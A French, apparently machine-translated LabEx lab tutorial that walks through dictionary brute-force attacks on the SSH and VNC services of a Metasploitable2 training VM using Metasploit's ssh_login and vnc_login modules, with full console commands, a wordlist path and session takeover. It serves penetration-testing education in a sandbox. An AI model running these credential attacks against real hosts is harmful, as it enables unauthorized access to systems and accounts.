Effectuer des attaques par force brute sur SSH et VNC avec Metasploit dans Nmap

NmapNmapBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce laboratoire, vous apprendrez à effectuer des attaques de force brute contre les services d'authentification par mot de passe faibles. Si un service réseau nécessite une autorisation pour y accéder et que le mécanisme d'autorisation repose sur des noms d'utilisateur et des mots de passe, les vulnérabilités liées aux mots de passe faibles peuvent devenir une cible d'attaque courante. Ce type de vulnérabilité est généralement causé par les utilisateurs qui configurent des mots de passe faibles, comme "123456".

La méthode la plus directe pour exploiter les mots de passe faibles consiste à utiliser une attaque de force brute basée sur un dictionnaire. Le fichier de dictionnaire contenant les noms d'utilisateur et les mots de passe potentiels est crucial dans cette attaque. L'attaquant tente de se connecter en utilisant les combinaisons de noms d'utilisateur et de mots de passe du dictionnaire jusqu'à ce qu'une connexion réussisse.

Dans ce laboratoire, vous utiliserez le terminal du Metasploit Framework (MSF) dans l'environnement Kali Linux sur la plateforme LabEx pour effectuer des attaques de force brute contre les services SSH et VNC de la machine cible Metasploitable2.

Remarque : Les instances cloud utilisées dans ce laboratoire sont limitées en nombre en raison de contraintes de coût. Veuillez vous assurer de démarrer l'environnement de laboratoire seulement lorsque vous avez suffisamment de temps pour terminer les exercices, afin d'éviter de gaspiller les instances.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/verbosity("Verbosity Levels") subgraph Lab Skills nmap/target_specification -.-> lab-416127{{"Effectuer des attaques par force brute sur SSH et VNC avec Metasploit dans Nmap"}} nmap/verbosity -.-> lab-416127{{"Effectuer des attaques par force brute sur SSH et VNC avec Metasploit dans Nmap"}} end

Comprendre l'environnement

Dans cette étape, vous apprendrez à connaître l'environnement de laboratoire et les conditions préalables pour effectuer les attaques de force brute.

L'environnement de laboratoire se compose de deux composants :

  1. Machine d'attaque : Un conteneur Kali Linux qui doit être démarré à l'aide de la commande docker et accessible via le shell bash.
  2. Machine cible : Une machine virtuelle Metasploitable2 avec le nom d'hôte target et l'adresse IP 192.168.122.102. Le nom d'utilisateur et le mot de passe par défaut de cette machine sont msfadmin/msfadmin. Cette machine doit être démarrée à l'aide du système de gestion de machines virtuelles Libvirt.

Les attaques seront menées depuis l'environnement Kali Linux en utilisant le Metasploit Framework (MSF) contre la machine cible.

Pour démarrer l'environnement de laboratoire, suivez ces étapes :

  1. Lancez un terminal XFCE sur la machine hôte LabEx (bureau Ubuntu).

  2. Démarrez la machine cible Metasploitable2 en utilisant la commande suivante :

sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez la connectivité à la machine cible en utilisant la commande ping (vous pouvez utiliser Ctrl+C pour arrêter le ping) :
ping 192.168.122.102
  1. Démarrez le conteneur Kali Linux et entrez dans le shell bash en utilisant la commande suivante :
docker run -ti --network host b5b709a49cd5 bash
  1. Testez la connectivité réseau depuis le conteneur Kali vers la machine cible en utilisant la commande ping (vous pouvez utiliser Ctrl+C pour arrêter le ping) :
ping 192.168.122.102

Maintenant, la machine d'attaque (conteneur Kali) et la machine cible (Metasploitable2) sont en cours d'exécution, et vous pouvez procéder aux attaques de force brute.

Remarque : Si vous quittez accidentellement le shell bash, le conteneur Kali s'arrêtera. Vous pouvez redémarrer un nouveau conteneur Kali et entrer à nouveau dans le shell bash en exécutant la commande docker run -ti --network host b5b709a49cd5 bash sur la machine hôte LabEx.

Attaque de force brute contre SSH

Dans cette étape, vous apprendrez à effectuer une attaque de force brute contre le service SSH de la machine cible Metasploitable2 en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux.

  1. Sur le conteneur Kali Linux, lancez la console Metasploit :
cd ~
msfconsole
  1. Dans la console Metasploit, utilisez le module auxiliary/scanner/ssh/ssh_login pour l'attaque de force brute contre SSH :
use auxiliary/scanner/ssh/ssh_login
  1. Configurez les options requises pour l'attaque :
  • Définissez l'hôte cible :
set rhosts 192.168.122.102
  • Définissez le fichier de dictionnaire de mots de passe (vous pouvez utiliser le fichier /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt fourni) :
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
  • Réglez la verbosité sur false pour éviter une sortie excessive :
set verbose false
  1. Vérifiez les options configurées :
show options
  1. Lancez l'attaque de force brute :
exploit

L'attaque commencera, en tentant de se connecter au service SSH en utilisant les combinaisons de noms d'utilisateur et de mots de passe du fichier de dictionnaire spécifié. Une fois une connexion réussie trouvée, les identifiants correspondants seront affichés.

Remarque : Le processus de force brute peut prendre beaucoup de temps. Vous pouvez interrompre le processus en appuyant sur Ctrl+C après l'affichage de la première connexion réussie, si vous le souhaitez.

  1. Une fois une connexion réussie trouvée, le script d'attaque créera automatiquement une session SSH. Vous pouvez basculer vers la session en utilisant la commande sessions -i <session_id>, où <session_id> est l'identifiant de session affiché dans la sortie.

  2. Dans la session SSH, vous pouvez exécuter diverses commandes sur la machine cible.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Attaque de force brute contre VNC

Dans cette étape, vous apprendrez à effectuer une attaque de force brute contre le service VNC de la machine cible Metasploitable2 en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Dans la console Metasploit, utilisez le module auxiliary/scanner/vnc/vnc_login pour l'attaque de force brute contre VNC :
use auxiliary/scanner/vnc/vnc_login
  1. Configurez le nombre de threads pour l'attaque (plus il y a de threads, plus l'attaque sera rapide, mais cela peut également augmenter les chances d'être détecté) :
set THREADS 5
  1. Définissez l'adresse IP de l'hôte cible :
set RHOSTS 192.168.122.102
  1. Lancez l'attaque de force brute :
exploit
  1. Les résultats de l'attaque seront affichés rapidement, car la connexion VNC ne nécessite pas de nom d'utilisateur et ne teste que les mots de passe faibles courants.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, vous avez appris à effectuer des attaques de force brute contre les services d'authentification par mot de passe faibles en utilisant le Metasploit Framework (MSF) dans l'environnement Kali Linux. Plus précisément, vous avez mené des attaques de force brute contre les services SSH et VNC de la machine cible Metasploitable2.

Le laboratoire a couvert les concepts clés suivants :

  • Comprendre l'environnement de laboratoire et les conditions préalables
  • Configurer le Metasploit Framework pour les attaques de force brute
  • Utiliser des fichiers de dictionnaire de mots de passe pour les attaques de force brute
  • Effectuer des attaques de force brute contre le service SSH
  • Analyser le script d'attaque de force brute SSH
  • Effectuer des attaques de force brute contre le service VNC

Grâce à cette expérience pratique, vous avez acquis des connaissances et des compétences pratiques dans la réalisation d'attaques de force brute contre les services d'authentification par mot de passe faibles, ce qui est un aspect crucial des tests de pénétration et du hacking éthique.